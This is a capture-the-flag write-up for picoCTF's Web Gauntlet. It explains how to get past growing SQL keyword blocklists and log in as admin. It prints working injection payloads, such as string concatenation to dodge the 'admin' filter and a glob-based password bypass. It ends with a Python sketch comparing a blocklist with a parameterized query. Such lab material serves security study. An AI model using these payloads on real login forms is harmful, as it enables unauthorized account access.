# Web Gauntlet

> **Web Gauntlet is a series of challenges on picoCTF that focuses on bypassing SQL injection filters, but not in an advanced way.**

### Level 1

First we see a login form, and we are required to log in as admin:

![](/files/UM4L1cbF5fEEIKgH5ASZ)

If we look at the filter, we see that these characters are filtered:

```
Round1: or
```

Nice, so we have a very simple authentication check that can be bypassed in many ways. The most basic option is to use `and` instead of `or`, as follows:

```
admin' and 1=1-- -;
```

![EZ !!](/files/EH4er6YIVcNNBV7nB9K9)

### Level 2

The same login form again, but the filter now has more characters, which are:

```
Round2: or and like = --
```

Before we solve it, let's imagine the executed query first:

```
SELECT * FROM users WHERE username = 'admin' AND password = ''
```

So if our username was `admin';`, this would close the string and terminate the query, right? The executed query ends up as:

```
SELECT * FROM users WHERE username = 'admin'; bla bla
```

![](/files/xKF3DpHZTKi9Oeh0qeOm)

### Level 3

Updated filter:

```
Round3: or and = like > < --
```

Since it filters neither `'` nor `;`, it will be the same solution as the previous one.

### Level 4

Updated filter:

```
Round4: or and = like > < -- admin
```

So it now filters for the word `admin`, and we need to log in as admin. This can be done with string concatenation: if it filters for `admin`, we can combine `adm` and `in`, which are not filtered, to get the word `admin`:

```
adm'||'in';
```

![](/files/wn0B0mzCJx5RyXItFy0K)

### Level 5

Updated filter:

```
Round5: or and = like > < -- union admin
```

The same filter, with only `union` added, which we didn't use anyway, so it will be the same solution.

### Level 6

Updated filter:

```
Filters: or and true false union like = > < ; -- /* */ admin
```

It now filters for the `;` character, which was important to terminate our query. Now we will include the password field to gain access as admin.

For the username part we can use `adm'||'in`, so it will be concatenated as `admin`.

For the password part we can think of multiple solutions, but I preferred to use the `glob` keyword, as follows: `' glob '*`

{% hint style="info" %}
This evaluates our query to: `SELECT * FROM users WHERE username = 'adm'||'in' AND password = '' glob '*'`

This basically means: get us the user with the username admin, with any password.
{% endhint %}
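
Why none of these blocklists hold, shown as an added example (not code from the challenge or from this write-up): the sketch assumes a SQLite backend and a login that concatenates input into the query text after a substring blocklist, then compares it with a parameterized query. The table contents, sample password and function names are constructed for illustration.

```python
import sqlite3

# Round 6 blocklist as listed on the page.
BLOCKLIST = ["or", "and", "true", "false", "union", "like",
             "=", ">", "<", ";", "--", "/*", "*/", "admin"]

def make_db():
    """In-memory SQLite database with one constructed sample user."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-sample-pw')")
    return db

def blocked(value):
    """Case-insensitive substring match against the blocklist (assumed design)."""
    low = value.lower()
    return any(tok in low for tok in BLOCKLIST)

def login_blocklist(db, username, password):
    """Weak: filtered input is still concatenated into the SQL text."""
    if blocked(username) or blocked(password):
        return None
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    row = db.execute(query).fetchone()
    return row[0] if row else None

def login_parameterized(db, username, password):
    """Fixed: input is bound as data, so quotes and operators are never parsed."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    user, pw = "adm'||'in", "' glob '*"  # Level 6 inputs discussed above
    print("blocklist     :", login_blocklist(db, user, pw))
    print("parameterized :", login_parameterized(db, user, pw))
    print("legit login   :",
          login_parameterized(db, "admin", "constructed-sample-pw"))
```

The blocklist also rejects the legitimate username `admin`, while the parameterized version accepts it and needs no filter at all.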
